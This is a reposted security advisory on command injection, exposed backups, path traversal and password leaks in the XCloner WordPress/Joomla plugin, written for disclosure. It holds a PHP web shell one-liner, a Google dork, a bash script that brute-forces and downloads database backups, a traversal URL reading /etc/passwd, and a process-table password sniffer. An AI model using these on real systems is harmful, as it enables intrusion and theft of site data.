扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 134 135 136 137 138 139 140 141 142 143 144 145 146 147 148 149 150 151 152 153 154 155 156 157 158 159 160 161 162 163 164 165 166 167 168 169 170 171 172 173 174 175 176 177 178 179 180 181 182 183 184 185 186 187 188 189 190 191 192 193 194 195 196 197 198 199 200 201 202 203 204 205 206 207 208 209 210 211 212 213 214 215 216 217 218 219 220 221 222 223 224 225 226 227 228 229 230 231 232 233 234 235 236 237 238 239 240 241 242 243 244 245 246 247 248 249 250 251 252 253 254 255 256 257 258 259 260 261 262 263 264 265 266 267 268 269 270 271 272 |
Title: XCloner WordPress/Joomla! backup Plugin v3.1.1 (WordPress) v3.5.1 (Joomla!) Vulnerabilities Author: Larry W. Cashdollar, @_larry0 Date: 10/17/2014 Download: https://wordpress.org/plugins/xcloner-backup-and-restore/ Download: http://extensions.joomla.org/extensions/access-a-security/site-security/backup/665 Downloads: WordPress 313,647 Joomla! 515745 StandAlone 69175 Website: http://www.xcloner.com Advisory: http://www.vapid.dhs.org/advisories/wordpress/plugins/Xcloner-v3.1.1/ Vendor: Notified 10/17/14 Ovidiu Liuta, @thinkovi Acknowledged & no other response. CVEID: Requested, TDB. OSVDBID:114176,114177,114178,114179,114180 Description: “XCloner is a Backup and Restore component designed for PHP/Mysql websites, it can work as a native plugin for WordPress and Joomla!.” Vulnerabilities:There are multiple vulnerabilities I’ve discovered in this plugin, they are as follows. 1. Arbitrary command execution. 2. Clear text MySQL password exposure through html text box under configuration panel. 3. Database backups exposed to local users due to open file permissions. 4. Unauthenticated remote access to backup files via easily guessable file names. 5. Authenticated remote file access. 6. MySQL password exposed to process table. Arbitrary Command Execution Plugin allows arbitrary commands to be executed by an authenticated user.The user will require administrative access rights to backup the database. User input when specifying your own file name is not sanitized as well as various other input fields. PoC All input fields I believe are vulnerable, I’ve chosen the backup filename and a wget of sh.txt which is simply <?php passthru($_GET)?> into a writeable directory by www-data. Screenshots available at the advisory URL above. All user configurable variables are vulnerable, these variables need to be sanitized before being passed to the exec() function for execution. $_CONFIG[tarpath] $exclude $_CONFIG['tarcompress'] $_CONFIG['filename'] $_CONFIG['exfile_tar'] $_CONFIG[sqldump] $_CONFIG['mysql_host'] $_CONFIG['mysql_pass'] $_CONFIG['mysql_user'] $database_name $sqlfile $filename Vulnerable code ./cloner.functions.php: 1672 exec($_CONFIG[tarpath] . " $exclude -c" . $_CONFIG['tarcompress'] . "vf $filename ./administrator/backups/index.html"); 1673 exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "vf $filename --update ./administrator/backups/database-sql.sql"); 1674 exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "vf $filename --update ./administrator/backups/htaccess.txt"); 1675 exec($_CONFIG[tarpath] . " -" . $_CONFIG['tarcompress'] . "vf $filename --update ./administrator/backups/perm.txt"); 1695-if ($_REQUEST[cron_dbonly] != 1) { 1696:exec($_CONFIG[tarpath] . " $excl_cmd " . " -X " . $_CONFIG['exfile_tar'] . "-chv" . $_CONFIG['tarcompress'] . "f $filename ./"); 1697-} else { 1698- 1699- 1700:exec($_CONFIG[tarpath] . "-" . $_CONFIG['tarcompress'] . "cvf $filename ./administrator/backups/database-sql.sql"); 1701- 1702-if (is_array($databases_incl)) { 1703-foreach ($databases_incl as $database_name) 1704-if ($database_name != "") { 1705:exec($_CONFIG[tarpath] . "-" . $_CONFIG['tarcompress'] . "vf $filename --update./administrator/backups/" . $database_name . "-sql.sql"); 1706-} 1707-} 1708-} -- 1873-{ 1874-//$sizeInBytes = filesize($path); 1875-$sizeInBytes = sprintf("%u", filesize($path)); 1876:if ((!$sizeInBytes) and (function_exists("exec"))){ 1877-$command = "ls -l \"$path\" | cut -d \" \" -f 5"; 1878:$sizeInBytes = @exec($command); 1879-} 2010-if ($_CONFIG['sql_mem']) { 2011:exec($_CONFIG[sqldump] . " -h " . $_CONFIG['mysql_host'] . " -u " . $_CONFIG['mysql_user'] . " -p" . $_CONFIG['mysql_pass'] . " " . $dbname . " > " . $sqlfile . " $drop --allow-k eywords " . $ex_dump); 2012- 2013-if (get_filesize($sqlfile) > 0) 2014-$databaseResult = LM_DATABASE_BACKUP_COMPLETED . ' ( ' . getFileSizeText(get_filesize($sqlfile)) . ' )'; 2015-else 2016-$databaseResult = LM_MSG_BACK_14; 2017- 2018:exec("chmod 777 $sqlfile"); 2019- 2020-return $sqlfile; 2021-} ./classes/fileRecursion.php 339-public static function getFileSize($file){ 340- 341-$sizeInBytes = sprintf("%u", filesize($file)); 342:if ((!$sizeInBytes) and (function_exists("exec"))){ 343-$command = "ls -l \"$file\" | cut -d \" \" -f 5"; 344:$sizeInBytes = @exec($command); 345-} 346- 347-return $sizeInBytes; ./restore/XCloner.php 290-}else{ 291-if($ext == '.tgz') $compress = 'z'; 292-else $compress = ''; 293:shell_exec("tar -x".$compress."pf $file -C $_CONFIG[output_path]"); 294-} 295-} 1077- if($_REQUEST['use_mysqldump'] == 1){ 1078: echo shell_exec($_REQUEST['mysqldump_path']." -u ".$_REQUEST[mysql_username]." -p".$_REQUEST[mysql_pass]." -h ".$_REQUEST[mysql_server]." ".$_REQUEST[mysql_db]." < ".$sqlfile); 1079- return; 1080-} Clear Text MySQL Database Password The plugin also returns the MySQL clear text password via html text box back to the user in the configuration panel.A password should never be repeated back to you in clear text.The plugin will happily send this over a clear text connection. Screenshots available at the advisory URL above. Remote Database Download & Local File Permissions The default recommend path for backup storage is /usr/share/wordpress/administrator/backups. An index.html file is created under this directory to prevent casual browsing however the file names are easily predictable. From the installation instructions: “XCloner is a tool that will help you manage your website backups, generate/restore/move so your website will be always secured! With XCloner you will be able to clone your site to any other location with just a few clicks. Don't forget to create the 'administrator/backups' directory in your WordPress root and make it fully writeable.” The format of the filenames are: backup_year-month-day_month_24hour_minute_domainname-sql-OPTIONS.tar where OPTIONS could be either -sql-drop, -sql-nodrop or -nosql depending on options selected during time of backup. The domain name is set by the HTTP_HOST header from line 88 ofcloner.config.php: 88: $_CONFIG['mosConfig_live_site']=$_SERVER['HTTP_HOST']; root@larry:/usr/share/wordpress/administrator/backups# ls -l total 129432 -rw-r--r-- 1 www-data www-data 44177408 Oct 29 13:15 backup_2014-10-29_10-14_testsite-sql-nodrop.tar -rw-r--r-- 1 www-data www-data 44177408 Oct 29 13:19 backup_2014-10-29_10-19_testsite-sql-nodrop.tar -rw-r--r-- 1 www-data www-data 44177408 Oct 29 13:24 backup_2014-10-29_10-24_testsite-sql-nodrop.tar These file permissions also expose the contents of the databases to any local system users. File naming convention code is as follows: 1327 $domainname = $_CONFIG['mosConfig_live_site']; 1351 if ($_REQUEST['bname'] == "") { 1352 if ($backupDatabase == 1) { 1353 if ($_REQUEST['dbbackup_drop']) { 1354 $filename1 = 'backup_' . date("Y-m-d_H-i") . '_' . $domainname . '-sql-drop' . $f_ext; 1355 } else { 1356 1357 $filename1 = 'backup_' . date("Y-m-d_H-i") . '_' . $domainname . '-sql-nodrop' . $f_ext; 1358 } 1359 } else 1360 $filename1 = 'backup_' . date("Y-m-d_H-i") . '_' . $domainname . '-nosql' . $f_ext; 1361 } else { Screenshots available at the advisory URL above. I’ve found a few vulnerable websites with the google dork: https://www.google.com/#q=inurl:+administrator%2Fbackups A PoC: lwc@wordpress:~$ bash exp.sh 192.168.0.26 [+] Location http://192.168.0.26/administrator/backups/backup_2014-10-30_06-27_-sql-nodrop.tar Found [+] Received HTTP/1.1 200 OK Downloading...... --2014-10-30 13:02:51--http://192.168.0.26/administrator/backups/backup_2014-10-30_06-27_-sql-nodrop.tar Connecting to 192.168.0.26:80... connected. HTTP request sent, awaiting response... 200 OK Length: 44400640 (42M) [application/x-tar] Saving to: <code>backup_2014-10-30_06-27_-sql-nodrop.tar.1' 100%[========================================>] 44,400,64056.9M/s in 0.7s 2014-10-30 13:02:52 (56.9 MB/s) - </code>backup_2014-10-30_06-27_-sql-nodrop.tar.1' saved [44400640/44400640] [+] Location http://192.168.0.26/administrator/backups/backup_2014-10-30_06-33_-sql-nodrop.tar Found [+] Received HTTP/1.1 200 OK Downloading...... --2014-10-30 13:02:52--http://192.168.0.26/administrator/backups/backup_2014-10-30_06-33_-sql-nodrop.tar Connecting to 192.168.0.26:80... connected. HTTP request sent, awaiting response... 200 OK Length: 44400640 (42M) [application/x-tar] Saving to: <code>backup_2014-10-30_06-33_-sql-nodrop.tar.1' 100%[========================================>] 44,400,64064.1M/s in 0.7s 2014-10-30 13:02:53 (64.1 MB/s) - </code>backup_2014-10-30_06-33_-sql-nodrop.tar.1' saved [44400640/44400640] #!/bin/bash #Exploit to download XCloner v3.1.1 Database backups OSVDB: 114177 #Larry W. Cashdollar, @_larry0 #XCloner recommends a backup storage path under the WP root directory #it uses a 0 size index.html file to block indexing. #we can try to brute force the filenames it creates. MONTH=10 DAY=30 #May need to set the DOMAIN to $1 the target depending on how WP is configured. DOMAIN= for y in <code>seq -w 1 24</code>; do for x in <code>seq -w 1 59</code>; do CPATH="http://$1/administrator/backups/backup_2014-"$MONTH"-"$DAY"_"$y"-"$x"_$DOMAIN-sql-nodrop.tar"; RESULT=<code>curl -s --head $CPATH|grep 200</code>; if [ -n "$RESULT" ]; then echo "[+] Location $CPATH Found"; echo "[+] Received $RESULT"; echo "Downloading......"; wget $CPATH fi; done done Remote File Access The user has to have administrative rights, but the backup downloader doesn’t check the path for ../. http://192.168.0.33/wp-admin/admin-ajax.php?action=json_return&page=xcloner_show&option=com_cloner&task=download&file=../../../../etc/passwd Will download /etc/passwd off the remote system. MySQL Database Password Exposed to Process Table Local users can steal the MySQL password by watching the process table: lwc@wordpress:/etc/wordpress$ while (true); do ps -ef |grep [m]ysqldump; done www-data 1669188890 09:27 ?00:00:00 sh -c mysqldump --quote-names-h localhost -u root -pPASSWORDHERE wordpress > /usr/share/wordpress/administrator/backups/database-sql.sql--allow-keywords www-data 16692 166910 09:27 ?00:00:00 mysqldump --quote-names -h localhost -u root -px xxxxxx wordpress --allow-keywords www-data 1669188890 09:27 ?00:00:00 sh -c mysqldump --quote-names-h localhost -u root -ps3cur1ty wordpress > /usr/share/wordpress/administrator/backups/database-sql.sql--allow-keywords www-data 16692 166910 09:27 ?00:00:00 mysqldump --quote-names -h localhost -u root -px xxxxxx wordpress --allow-keywords ^C |
体验盒子
